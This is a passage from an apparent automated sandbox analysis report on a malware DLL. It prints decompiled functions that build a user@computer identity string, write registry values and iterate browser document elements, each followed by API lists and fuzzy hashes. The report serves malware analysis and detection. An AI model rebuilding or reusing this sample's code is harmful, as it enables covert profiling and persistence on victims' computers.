					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t63 = E023E2049(_v12 + _t43 + 2 << 2);
						if(_t63 != 0) {
							_t47 = _v12;
							_t66 = _t63 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t66,  &_v8) == 0) {
								L7:
								E023E9039(_t63);
							} else {
								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x23ea33a
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t63[_t57] = 0;
										_v16 = _t63;
									}
								}
							}
						}
					}
				}
				return _v16;
			}














                                                                                                                                                                                                                                    0x023e7657
                                                                                                                                                                                                                                    0x023e765a
                                                                                                                                                                                                                                    0x023e765d
                                                                                                                                                                                                                                    0x023e7663
                                                                                                                                                                                                                                    0x023e7668
                                                                                                                                                                                                                                    0x023e766e
                                                                                                                                                                                                                                    0x023e7676
                                                                                                                                                                                                                                    0x023e7679
                                                                                                                                                                                                                                    0x023e767f
                                                                                                                                                                                                                                    0x023e7684
                                                                                                                                                                                                                                    0x023e7691
                                                                                                                                                                                                                                    0x023e769e
                                                                                                                                                                                                                                    0x023e76a2
                                                                                                                                                                                                                                    0x023e76a4
                                                                                                                                                                                                                                    0x023e76a8
                                                                                                                                                                                                                                    0x023e76ab
                                                                                                                                                                                                                                    0x023e76bb
                                                                                                                                                                                                                                    0x023e770d
                                                                                                                                                                                                                                    0x023e770e
                                                                                                                                                                                                                                    0x023e76bd
                                                                                                                                                                                                                                    0x023e76c0
                                                                                                                                                                                                                                    0x023e76c7
                                                                                                                                                                                                                                    0x023e76ca
                                                                                                                                                                                                                                    0x023e76dd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e76df
                                                                                                                                                                                                                                    0x023e76e2
                                                                                                                                                                                                                                    0x023e76e7
                                                                                                                                                                                                                                    0x023e76f5
                                                                                                                                                                                                                                    0x023e76f8
                                                                                                                                                                                                                                    0x023e7700
                                                                                                                                                                                                                                    0x023e7703
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e7705
                                                                                                                                                                                                                                    0x023e7705
                                                                                                                                                                                                                                    0x023e7708
                                                                                                                                                                                                                                    0x023e7708
                                                                                                                                                                                                                                    0x023e7703
                                                                                                                                                                                                                                    0x023e76dd
                                                                                                                                                                                                                                    0x023e7713
                                                                                                                                                                                                                                    0x023e7714
                                                                                                                                                                                                                                    0x023e7684
                                                                                                                                                                                                                                    0x023e771a

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetUserNameW.ADVAPI32(00000000,023EA338), ref: 023E765D
                                                                                                                                                                                                                                    • GetComputerNameW.KERNEL32(00000000,023EA338), ref: 023E7679
                                                                                                                                                                                                                                      • Part of subcall function 023E2049: RtlAllocateHeap.NTDLL(00000000,00000000,023E7E50), ref: 023E2055
                                                                                                                                                                                                                                    • GetUserNameW.ADVAPI32(00000000,023EA338), ref: 023E76B3
                                                                                                                                                                                                                                    • GetComputerNameW.KERNEL32(023EA338,?), ref: 023E76D5
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,023EA338,00000000,023EA33A,00000000,00000000,?,?,023EA338), ref: 023E76F8
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3850880919-0
                                                                                                                                                                                                                                    • Opcode ID: 107f7af8cfc7ea7641ce9cd02f75724884624f1822fe64f62d724d9fdefe08c8
                                                                                                                                                                                                                                    • Instruction ID: c91ffb173172035f8d7820ce50232fa293ec24289f470305704b03189490925a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 107f7af8cfc7ea7641ce9cd02f75724884624f1822fe64f62d724d9fdefe08c8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9021BAB5900219EBCF11DFA9D985CAEBBBCEF44344B54446AE502E7280D7349F49DB60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E1585, Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                                                                                                    			E023E1585(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E023E7F27(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E023EA9AB(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0x23ed130() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                                                                                                                                                                                                                                    0x023e1585
                                                                                                                                                                                                                                    0x023e1592
                                                                                                                                                                                                                                    0x023e1594
                                                                                                                                                                                                                                    0x023e15f7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e15f7
                                                                                                                                                                                                                                    0x023e15ac
                                                                                                                                                                                                                                    0x023e15b3
                                                                                                                                                                                                                                    0x023e15bf
                                                                                                                                                                                                                                    0x023e15c4
                                                                                                                                                                                                                                    0x023e15c6
                                                                                                                                                                                                                                    0x023e15c8
                                                                                                                                                                                                                                    0x023e15ca
                                                                                                                                                                                                                                    0x023e15cc
                                                                                                                                                                                                                                    0x023e15ce
                                                                                                                                                                                                                                    0x023e15da
                                                                                                                                                                                                                                    0x023e15ea
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e15dc
                                                                                                                                                                                                                                    0x023e15dc
                                                                                                                                                                                                                                    0x023e15e3
                                                                                                                                                                                                                                    0x023e15f0
                                                                                                                                                                                                                                    0x023e15f0
                                                                                                                                                                                                                                    0x023e15f0
                                                                                                                                                                                                                                    0x023e15e3
                                                                                                                                                                                                                                    0x023e15da
                                                                                                                                                                                                                                    0x023e15f5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e15fb

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ResetEvent.KERNEL32(?,00000008,?,?,00000102,023E11DA,?,?,00000000,00000000), ref: 023E15BF
                                                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 023E15C4
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 023E15DC
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000102,023E11DA,?,?,00000000,00000000), ref: 023E15F7
                                                                                                                                                                                                                                      • Part of subcall function 023E7F27: lstrlen.KERNEL32(00000000,00000008,?,76D24D40,?,?,023E15A4,?,?,?,?,00000102,023E11DA,?,?,00000000), ref: 023E7F33
                                                                                                                                                                                                                                      • Part of subcall function 023E7F27: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,023E15A4,?,?,?,?,00000102,023E11DA,?), ref: 023E7F91
                                                                                                                                                                                                                                      • Part of subcall function 023E7F27: lstrcpy.KERNEL32(00000000,00000000), ref: 023E7FA1
                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 023E15EA
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1449191863-0
                                                                                                                                                                                                                                    • Opcode ID: ae98621ddc8639946fec08c54644d1a3764f297b462dc362ab2fa24d35fcce97
                                                                                                                                                                                                                                    • Instruction ID: a968ef9de865c49145b2bd476d6cf1b96274f024ab70e232a92308ce73e00b5e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae98621ddc8639946fec08c54644d1a3764f297b462dc362ab2fa24d35fcce97
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B016D71540721ABDE31AB21DC44B1FB6A9FF48364F104E2AF5ABA10E0DB30EC5DDA21
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E8F10, Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E023E8F10(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t13;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x23ed26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t13 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x23ed25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x23ed258 = _t6;
					 *0x23ed264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x23ed254 = _t7;
					if(_t7 == 0) {
						 *0x23ed254 =  *0x23ed254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 > 0) {
					goto L5;
				}
				_t13 = _t4 - _t4;
				goto L4;
			}









                                                                                                                                                                                                                                    0x023e8f18
                                                                                                                                                                                                                                    0x023e8f20
                                                                                                                                                                                                                                    0x023e8f25
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e8f7a
                                                                                                                                                                                                                                    0x023e8f27
                                                                                                                                                                                                                                    0x023e8f2f
                                                                                                                                                                                                                                    0x023e8f37
                                                                                                                                                                                                                                    0x023e8f37
                                                                                                                                                                                                                                    0x023e8f77
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e8f77
                                                                                                                                                                                                                                    0x023e8f39
                                                                                                                                                                                                                                    0x023e8f39
                                                                                                                                                                                                                                    0x023e8f3e
                                                                                                                                                                                                                                    0x023e8f50
                                                                                                                                                                                                                                    0x023e8f55
                                                                                                                                                                                                                                    0x023e8f5b
                                                                                                                                                                                                                                    0x023e8f63
                                                                                                                                                                                                                                    0x023e8f68
                                                                                                                                                                                                                                    0x023e8f6a
                                                                                                                                                                                                                                    0x023e8f6a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e8f71
                                                                                                                                                                                                                                    0x023e8f33
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e8f35
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,023E6A90,?,?,00000001,?,?,?,023E807D,?), ref: 023E8F18
                                                                                                                                                                                                                                    • GetVersion.KERNEL32(?,00000001,?,?,?,023E807D,?), ref: 023E8F27
                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,023E807D,?), ref: 023E8F3E
                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,023E807D,?), ref: 023E8F5B
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000001,?,?,?,023E807D,?), ref: 023E8F7A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2270775618-0
                                                                                                                                                                                                                                    • Opcode ID: 5169b0deb4676a493d17fc72ee169744c6980e0d16a43ee5e7bbcdedffa00548
                                                                                                                                                                                                                                    • Instruction ID: b04f46c20c6b8323af082a73a3e2c4eb33590e8dea9bea53fecfdb0a9031e5c8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5169b0deb4676a493d17fc72ee169744c6980e0d16a43ee5e7bbcdedffa00548
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E0F019B0EE4315DAEF308F64A909B183B6EA744791F004D1AE552CA1E0D771D46ECA16
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E17D5, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 172stringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                                                                                                    			E023E17D5(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t88;
				void* _t97;
				void* _t98;
				char _t104;
				signed int* _t106;
				intOrPtr* _t107;
				void* _t108;

				_t98 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t104 = _a16;
				if(_t104 == 0) {
					__imp__( &_v284,  *0x23ed33c);
					_t97 = 0x80000002;
					L6:
					_t60 = E023E809F(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t107 = _a24;
					if(E023E88B7(_t98, _t103, _t107, _t97, _t60) != 0) {
						L27:
						E023E9039(_a8);
						goto L29;
					}
					_t65 =  *0x23ed27c; // 0x28da5a8
					_t16 = _t65 + 0x23ee8fe; // 0x65696c43
					_t68 = E023E809F(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t107 + 0x14; // 0x102
						_t33 = _t107 + 0x10; // 0x3d023ec0
						if(E023EA635(_t103,  *_t33, _t97, _a8,  *0x23ed334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
							_t72 =  *0x23ed27c; // 0x28da5a8
							if(_t104 == 0) {
								_t35 = _t72 + 0x23eea5f; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0x23ee89f; // 0x55434b48
								_t73 = _t34;
							}
							if(E023E816C(_t73,  *0x23ed334,  *0x23ed338,  &_a24,  &_a16) == 0) {
								if(_t104 == 0) {
									_t75 =  *0x23ed27c; // 0x28da5a8
									_t44 = _t75 + 0x23ee871; // 0x74666f53
									_t78 = E023E809F(0, _t44);
									_t105 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t107 + 0x10; // 0x3d023ec0
										E023E2659( *_t47, _t97, _a8,  *0x23ed338, _a24);
										_t49 = _t107 + 0x10; // 0x3d023ec0
										E023E2659( *_t49, _t97, _t105,  *0x23ed330, _a16);
										E023E9039(_t105);
									}
								} else {
									_t40 = _t107 + 0x10; // 0x3d023ec0
									E023E2659( *_t40, _t97, _a8,  *0x23ed338, _a24);
									_t43 = _t107 + 0x10; // 0x3d023ec0
									E023E2659( *_t43, _t97, _a8,  *0x23ed330, _a16);
								}
								if( *_t107 != 0) {
									E023E9039(_a24);
								} else {
									 *_t107 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t107 + 0x10; // 0x3d023ec0
					if(E023E6BFA( *_t21, _t97, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t106 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t106 =  *_t106 & 0x00000000;
							_t26 = _t107 + 0x10; // 0x3d023ec0
							E023EA635(_t103,  *_t26, _t97, _a8, _a24, _t106);
						}
						E023E9039(_t106);
						_t104 = _a16;
					}
					E023E9039(_a24);
					goto L14;
				}
				if(_t104 <= 8 || _t104 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t103 = _a8;
					E023EA8D8(_t104, _a8,  &_v284);
					__imp__(_t108 + _t104 - 0x117,  *0x23ed33c);
					 *((char*)(_t108 + _t104 - 0x118)) = 0x5c;
					_t97 = 0x80000003;
					goto L6;
				}
			}























                                                                                                                                                                                                                                    0x023e17d5
                                                                                                                                                                                                                                    0x023e17de
                                                                                                                                                                                                                                    0x023e17e5
                                                                                                                                                                                                                                    0x023e17ea
                                                                                                                                                                                                                                    0x023e1857
                                                                                                                                                                                                                                    0x023e185d
                                                                                                                                                                                                                                    0x023e1862
                                                                                                                                                                                                                                    0x023e186b
                                                                                                                                                                                                                                    0x023e1872
                                                                                                                                                                                                                                    0x023e1875
                                                                                                                                                                                                                                    0x023e19e9
                                                                                                                                                                                                                                    0x023e19f0
                                                                                                                                                                                                                                    0x023e19f0
                                                                                                                                                                                                                                    0x023e19f5
                                                                                                                                                                                                                                    0x023e19f7
                                                                                                                                                                                                                                    0x023e19f7
                                                                                                                                                                                                                                    0x023e1a00
                                                                                                                                                                                                                                    0x023e1a00
                                                                                                                                                                                                                                    0x023e187b
                                                                                                                                                                                                                                    0x023e1887
                                                                                                                                                                                                                                    0x023e19df
                                                                                                                                                                                                                                    0x023e19e2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e19e2
                                                                                                                                                                                                                                    0x023e188d
                                                                                                                                                                                                                                    0x023e1892
                                                                                                                                                                                                                                    0x023e189b
                                                                                                                                                                                                                                    0x023e18a2
                                                                                                                                                                                                                                    0x023e18a5
                                                                                                                                                                                                                                    0x023e18ef
                                                                                                                                                                                                                                    0x023e18ef
                                                                                                                                                                                                                                    0x023e1902
                                                                                                                                                                                                                                    0x023e190c
                                                                                                                                                                                                                                    0x023e1914
                                                                                                                                                                                                                                    0x023e1919
                                                                                                                                                                                                                                    0x023e1923
                                                                                                                                                                                                                                    0x023e1923
                                                                                                                                                                                                                                    0x023e191b
                                                                                                                                                                                                                                    0x023e191b
                                                                                                                                                                                                                                    0x023e191b
                                                                                                                                                                                                                                    0x023e191b
                                                                                                                                                                                                                                    0x023e1945
                                                                                                                                                                                                                                    0x023e194d
                                                                                                                                                                                                                                    0x023e197b
                                                                                                                                                                                                                                    0x023e1980
                                                                                                                                                                                                                                    0x023e1989
                                                                                                                                                                                                                                    0x023e198e
                                                                                                                                                                                                                                    0x023e1992
                                                                                                                                                                                                                                    0x023e19c4
                                                                                                                                                                                                                                    0x023e1994
                                                                                                                                                                                                                                    0x023e19a1
                                                                                                                                                                                                                                    0x023e19a4
                                                                                                                                                                                                                                    0x023e19b4
                                                                                                                                                                                                                                    0x023e19b7
                                                                                                                                                                                                                                    0x023e19bd
                                                                                                                                                                                                                                    0x023e19bd
                                                                                                                                                                                                                                    0x023e194f
                                                                                                                                                                                                                                    0x023e195c
                                                                                                                                                                                                                                    0x023e195f
                                                                                                                                                                                                                                    0x023e1971
                                                                                                                                                                                                                                    0x023e1974
                                                                                                                                                                                                                                    0x023e1974
                                                                                                                                                                                                                                    0x023e19ce
                                                                                                                                                                                                                                    0x023e19da
                                                                                                                                                                                                                                    0x023e19d0
                                                                                                                                                                                                                                    0x023e19d3
                                                                                                                                                                                                                                    0x023e19d3
                                                                                                                                                                                                                                    0x023e19ce
                                                                                                                                                                                                                                    0x023e1945
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e190c
                                                                                                                                                                                                                                    0x023e18b4
                                                                                                                                                                                                                                    0x023e18be
                                                                                                                                                                                                                                    0x023e18c0
                                                                                                                                                                                                                                    0x023e18c5
                                                                                                                                                                                                                                    0x023e18c9
                                                                                                                                                                                                                                    0x023e18cb
                                                                                                                                                                                                                                    0x023e18d6
                                                                                                                                                                                                                                    0x023e18d9
                                                                                                                                                                                                                                    0x023e18d9
                                                                                                                                                                                                                                    0x023e18df
                                                                                                                                                                                                                                    0x023e18e4
                                                                                                                                                                                                                                    0x023e18e4
                                                                                                                                                                                                                                    0x023e18ea
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e18ea
                                                                                                                                                                                                                                    0x023e17ef
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e1816
                                                                                                                                                                                                                                    0x023e1816
                                                                                                                                                                                                                                    0x023e1822
                                                                                                                                                                                                                                    0x023e1835
                                                                                                                                                                                                                                    0x023e183b
                                                                                                                                                                                                                                    0x023e1843
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e1843

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • StrChrA.SHLWAPI(023E3C81,0000005F,00000000,00000000,00000104), ref: 023E1808
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,?), ref: 023E1835
                                                                                                                                                                                                                                      • Part of subcall function 023E809F: lstrlen.KERNEL32(?,00000000,023ED330,00000001,023E2200,023ED00C,023ED00C,00000000,00000005,00000000,00000000,?,?,?,023E96C1,023E23E9), ref: 023E80A8
                                                                                                                                                                                                                                      • Part of subcall function 023E809F: mbstowcs.NTDLL ref: 023E80CF
                                                                                                                                                                                                                                      • Part of subcall function 023E809F: memset.NTDLL ref: 023E80E1
                                                                                                                                                                                                                                      • Part of subcall function 023E2659: lstrlenW.KERNEL32(023E3C81,?,?,023E19A9,3D023EC0,80000002,023E3C81,023E8B1E,74666F53,4D4C4B48,023E8B1E,?,3D023EC0,80000002,023E3C81,?), ref: 023E2679
                                                                                                                                                                                                                                      • Part of subcall function 023E9039: HeapFree.KERNEL32(00000000,00000000,023E7F18,00000000,?,?,00000000), ref: 023E9045
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 023E1857
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                                                                                                                                                                                                    • String ID: \
                                                                                                                                                                                                                                    • API String ID: 3924217599-2967466578
                                                                                                                                                                                                                                    • Opcode ID: b3af76fd2635bd0f2b61ca21272c442feaceaf1f0e919724f5ef41274732dad1
                                                                                                                                                                                                                                    • Instruction ID: fcd260c9eca5ad7eb5e1e168c8ff98b02e56999850b8ff674cd3275589444f66
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3af76fd2635bd0f2b61ca21272c442feaceaf1f0e919724f5ef41274732dad1
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 435139B2500219EFDF219FA0DD40EAA37BEBB18314F008915FA6A965A0D731ED2DDF50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E52F9, Relevance: 6.2, APIs: 4, Instructions: 152memorystringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 46%
                                                                                                                                                                                                                                    			E023E52F9(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0x23ed27c; // 0x28da5a8
					_t5 = _t102 + 0x23ee038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x23ec2b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0x23ed27c; // 0x28da5a8
												_t28 = _t108 + 0x23ee0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x23ed27c; // 0x28da5a8
														_t33 = _t78 + 0x23ee078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
